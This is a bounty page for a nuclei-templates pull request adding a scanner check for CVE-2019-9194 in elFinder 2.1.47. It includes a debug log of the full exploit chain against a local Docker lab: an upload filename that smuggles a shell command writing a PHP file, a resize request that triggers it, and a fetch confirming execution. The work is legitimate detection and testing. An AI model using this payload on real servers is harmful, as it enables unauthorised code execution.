PR
Create CVE-2019-9194.yaml
projectdiscovery/nuclei-templates#12290
Template / PR Information
- Added CVE-2019-9194
- References:
Template Validation
I’ve validated this template locally?
- YES
- NO
Additional Details (leave it blank if not applicable)
/claim 12288
debug:
❯ ./nuclei -duc -t nuclei-templates/http/cves/2019/CVE-2019-9194.yaml -target http://127.0.0.1:8000 -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.2
projectdiscovery.io
[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 42
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2019-9194] Dumped HTTP request for http://127.0.0.1:8000/php/connector.minimal.php
POST /php/connector.minimal.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Content-Length: 771
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Accept-Encoding: gzip
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="cmd"
upload
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="target"
l1_Lw
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="upload[]"; filename="wsnyks.jpeg;echo PD9waHAgZWNobyBtZDUoJ3h2b3ppdScpO3VubGluayhfX0ZJTEVfXyk7Pz4= | base64 -d > xvoziu.php;echo wsnyks.jpeg"
Content-Type: image/jpeg
����JFIF``��8Photoshop 3.08BIMt��;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82
��C
!'"#%%%),($+!$%$��C $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$��"��
------WebKitFormBoundary7MA4YWxkTrZu0gW--
[DBG] [CVE-2019-9194] Dumped HTTP response http://127.0.0.1:8000/php/connector.minimal.php
HTTP/1.1 200 OK
Connection: close
Content-Length: 1816
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: application/json; charset=utf-8
Date: Tue, 10 Jun 2025 06:46:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=03esq0iud4u5c6o0op3ahcdes3; path=/
{"added":[{"isowner":false,"ts":1749537990,"mime":"image\/jpeg","read":1,"write":1,"size":"284","hash":"l1_d3NueWtzLmpwZWc7ZWNobyBQRDl3YUhBZ1pXTm9ieUJ0WkRVb0ozaDJiM3BwZFNjcE8zVnViR2x1YXloZlgwWkpURVZmWHlrN1B6ND0gfCBiYXNlNjQgLWQgPiB4dm96aXUucGhwO2VjaG8gd3NueWtzLmpwZWc","name":"wsnyks.jpeg;echo PD9waHAgZWNobyBtZDUoJ3h2b3ppdScpO3VubGluayhfX0ZJTEVfXyk7Pz4= | base64 -d > xvoziu.php;echo wsnyks.jpeg","phash":"l1_Lw","tmb":1,"url":"\/php\/..\/files\/wsnyks.jpeg%3Becho%20PD9waHAgZWNobyBtZDUoJ3h2b3ppdScpO3VubGluayhfX0ZJTEVfXyk7Pz4%3D%20%7C%20base64%20-d%20%3E%20xvoziu.php%3Becho%20wsnyks.jpeg"}],"removed":[],"changed":[{"isowner":false,"ts":1749537729,"mime":"directory","read":1,"write":1,"size":0,"hash":"l1_Lw","name":"files","rootRev":"","options":{"path":"","url":"\/php\/..\/files\/","tmbUrl":"\/php\/..\/files\/.tmb\/","disabled":["chmod"],"separator":"\/","copyOverwrite":1,"uploadOverwrite":1,"uploadMaxSize":9223372036854775807,"uploadMaxConn":3,"uploadMime":{"firstOrder":"deny","allow":["image\/x-ms-bmp","image\/gif","image\/jpeg","image\/png","image\/x-icon","text\/plain"],"deny":["all"]},"dispInlineRegex":"^(?:(?:video|audio)|image\/(?!.+\\+xml)|application\/(?:ogg|x-mpegURL|dash\\+xml)|(?:text\/plain|application\/pdf)$)","jpgQuality":100,"archivers":{"create":["application\/x-tar","application\/x-gzip","application\/x-bzip2","application\/zip"],"extract":["application\/x-tar","application\/x-gzip","application\/x-bzip2","application\/zip"],"createext":{"application\/x-tar":"tar","application\/x-gzip":"tgz","application\/x-bzip2":"tbz","application\/zip":"zip"}},"uiCmdMap":[],"syncChkAsTs":1,"syncMinMs":10000,"i18nFolderName":0,"tmbCrop":1,"substituteImg":true,"onetimeUrl":false,"trashHash":"t1_Lw","csscls":"elfinder-navbar-root-local"},"volumeid":"l1_","locked":1,"isroot":1,"phash":""}]}
[INF] [CVE-2019-9194] Dumped HTTP request for http://127.0.0.1:8000/php/connector.minimal.php?target=l1_d3NueWtzLmpwZWc7ZWNobyBQRDl3YUhBZ1pXTm9ieUJ0WkRVb0ozaDJiM3BwZFNjcE8zVnViR2x1YXloZlgwWkpURVZmWHlrN1B6ND0gfCBiYXNlNjQgLWQgPiB4dm96aXUucGhwO2VjaG8gd3NueWtzLmpwZWc°ree=180&mode=rotate&cmd=resize
GET /php/connector.minimal.php?target=l1_d3NueWtzLmpwZWc7ZWNobyBQRDl3YUhBZ1pXTm9ieUJ0WkRVb0ozaDJiM3BwZFNjcE8zVnViR2x1YXloZlgwWkpURVZmWHlrN1B6ND0gfCBiYXNlNjQgLWQgPiB4dm96aXUucGhwO2VjaG8gd3NueWtzLmpwZWc°ree=180&mode=rotate&cmd=resize HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_17) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Cookie: PHPSESSID=03esq0iud4u5c6o0op3ahcdes3
Accept-Encoding: gzip
[DBG] [CVE-2019-9194] Dumped HTTP response http://127.0.0.1:8000/php/connector.minimal.php?target=l1_d3NueWtzLmpwZWc7ZWNobyBQRDl3YUhBZ1pXTm9ieUJ0WkRVb0ozaDJiM3BwZFNjcE8zVnViR2x1YXloZlgwWkpURVZmWHlrN1B6ND0gfCBiYXNlNjQgLWQgPiB4dm96aXUucGhwO2VjaG8gd3NueWtzLmpwZWc°ree=180&mode=rotate&cmd=resize
HTTP/1.1 200 OK
Connection: close
Content-Length: 450
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: application/json; charset=utf-8
Date: Tue, 10 Jun 2025 06:46:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=m37ak50aaui7j529cdvj4m2uip; path=/
{"changed":[{"isowner":false,"ts":1749537990,"mime":"image\/jpeg","read":1,"write":1,"size":"284","hash":"l1_d3NueWtzLmpwZWc7ZWNobyBQRDl3YUhBZ1pXTm9ieUJ0WkRVb0ozaDJiM3BwZFNjcE8zVnViR2x1YXloZlgwWkpURVZmWHlrN1B6ND0gfCBiYXNlNjQgLWQgPiB4dm96aXUucGhwO2VjaG8gd3NueWtzLmpwZWc","name":"wsnyks.jpeg;echo PD9waHAgZWNobyBtZDUoJ3h2b3ppdScpO3VubGluayhfX0ZJTEVfXyk7Pz4= | base64 -d > xvoziu.php;echo wsnyks.jpeg","phash":"l1_Lw","tmb":1,"width":262,"height":192}]}
[INF] [CVE-2019-9194] Dumped HTTP request for http://127.0.0.1:8000/php/xvoziu.php
GET /php/xvoziu.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.20
Connection: close
Cookie: PHPSESSID=m37ak50aaui7j529cdvj4m2uip
Accept-Encoding: gzip
[DBG] [CVE-2019-9194] Dumped HTTP response http://127.0.0.1:8000/php/xvoziu.php
HTTP/1.1 200 OK
Connection: close
Content-Length: 32
Content-Type: text/html; charset=UTF-8
Date: Tue, 10 Jun 2025 06:46:30 GMT
Server: Apache/2.4.29 (Ubuntu)
1e69dd366e96d7d51e23d619cb9f487b
[CVE-2019-9194:word-3] [http] [critical] http://127.0.0.1:8000/php/xvoziu.php
[CVE-2019-9194:word-1] [http] [critical] http://127.0.0.1:8000/php/xvoziu.php
[CVE-2019-9194:status-2] [http] [critical] http://127.0.0.1:8000/php/xvoziu.php
Dockefile:
FROM ubuntu:18.04
LABEL maintainer="r00tuser111"
ARG DEBIAN_FRONTEND=noninteractive
RUN set -ex \
&& apt-get update \
&& apt-get install -y --no-install-recommends \
apache2 \
php7.2 \
php7.2-cli \
php7.2-common \
php7.2-curl \
php7.2-gd \
php7.2-json \
php7.2-mbstring \
php7.2-mysql \
php7.2-xml \
libapache2-mod-php7.2 \
unzip \
zip \
curl \
exiftran \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
RUN a2enmod php7.2 rewrite
# download elFinder-2.1.47.tar.gz
RUN set -ex \
&& cd /var/www/html/ \
&& curl -sSL https://github.com/Studio-42/elFinder/archive/2.1.47.tar.gz | tar --strip-components 1 -xz
RUN set -ex \
&& cd /var/www/html/ \
&& mv ./php/connector.minimal.php-dist ./php/connector.minimal.php \
&& cp elfinder.html index.html \
&& chown www-data:www-data -R ./
EXPOSE 80
CMD ["apache2ctl", "-D", "FOREGROUND"]
build Mirror
docker build -t elfinder-2.1.47 .
run
docker run -p 8000:80 elfinder-2.1.47
Additional References:
Claim
Total prize pool
$50
Total paid
$50
Status
Approved
Submitted
June 10, 2025
Last updated
June 10, 2025
Contributors
R0
r00tuser
@r00tuser111
Sponsors
PR
ProjectDiscovery
@projectdiscovery
$50
paid